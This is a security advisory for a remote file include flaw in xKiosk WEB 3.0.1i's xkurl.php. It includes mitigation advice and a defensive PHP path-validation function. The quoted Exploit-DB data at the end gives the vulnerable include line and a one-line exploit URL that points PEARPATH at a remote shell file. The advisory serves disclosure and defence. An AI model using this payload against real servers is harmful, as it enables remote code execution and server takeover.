Vendor: xKiosk WEB
Author: BorN To K!LL
CVSS: HIGH
Vulnerability Type: Remote File Include
Product Name: xKiosk WEB
Affected Version From: 3.0.1i
Affected Version To: 3.0.1i
Patch Exists: NO
Year: 2007

xKiosk WEB <= (PEARPATH) Remote File Include Vulnerability

The xKiosk WEB script, version 3.0.1i, is vulnerable to remote file inclusion. The 'system/funcs/xkurl.php' script builds an include() path from the 'PEARPATH' variable, which can be supplied as a request parameter, so an attacker can make the script include a remote file. This can lead to arbitrary code execution on the server.

Mitigation:

To mitigate this vulnerability, update the xKiosk WEB script to a version that addresses this issue as soon as one is available. Additionally, ensure that the 'PEARPATH' value is properly validated and sanitized before any file is included.
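As an added defensive illustration (not xKiosk's own code), the vulnerable include($PEARPATH.'Client.php') pattern rewritten so that the directory can only come from server-side configuration and the included file is pinned and verified; the function name and the sample path are assumptions.

```php
<?php
// Added illustration, not xKiosk's own code. In the advisory the include path
// is built from $PEARPATH, a variable that a request parameter could populate
// (register_globals-era PHP), so a URL supplied in ?PEARPATH= becomes the
// include target. This helper keeps the directory server-side and pins the file.
declare(strict_types=1);

/**
 * Resolve the path of Client.php under a configured PEAR directory.
 * $configuredPearPath must come from a config file or ini value, never from
 * $_GET, $_POST or $_COOKIE. Throws if the result is not the expected local file.
 */
function resolvePearClientPath(string $configuredPearPath): string
{
    // Refuse any stream-wrapper prefix (http://, ftp://, php://, data:) up front;
    // a remote include is exactly what the advisory describes. The "+" keeps a
    // single-letter Windows drive prefix such as C: from being rejected.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $configuredPearPath)) {
        throw new RuntimeException('PEARPATH must be a local directory, not a URL');
    }

    $baseDir = realpath($configuredPearPath);
    if ($baseDir === false || !is_dir($baseDir)) {
        throw new RuntimeException('PEARPATH does not resolve to an existing directory');
    }
    $baseDir = rtrim($baseDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // Only one specific file is ever included from this directory.
    $candidate = realpath($baseDir . 'Client.php');
    if ($candidate === false || !is_file($candidate)) {
        throw new RuntimeException('Client.php not found under PEARPATH');
    }

    // realpath() has collapsed symlinks and ../ segments; confirm we stayed inside.
    if (strncmp($candidate, $baseDir, strlen($baseDir)) !== 0) {
        throw new RuntimeException('Resolved include escapes the configured directory');
    }

    return $candidate;
}

// Hypothetical caller: the directory is a server-side setting, never request input.
$configuredPearPath = '/usr/share/php';   // constructed example value
include resolvePearClientPath($configuredPearPath);
```

Pair this with allow_url_include=Off (and allow_url_fopen=Off where the application permits it) in php.ini so that include() cannot open URL wrappers at all; that setting blocks this class of bug even when application code gets it wrong.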

Exploit-DB raw data:

xKiosk WEB <= (PEARPATH) Remote File Include Vulnerability

Script : xKiosk WEB

Version : 3.0.1i

Download : http://xkiosk.net/xkiosk.3.0.1j.web.zip

AUTHOR : BorN To K!LL

Vuln Code :

include($PEARPATH.'Client.php');

3xpl0!T :

[p4th]/system/funcs/xkurl.php?PEARPATH=[-SHell-]

Greetings 2 :

str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ..

BorN To K!LL <> GoLd_M = 4ever ... =P

# milw0rm.com [2007-10-08]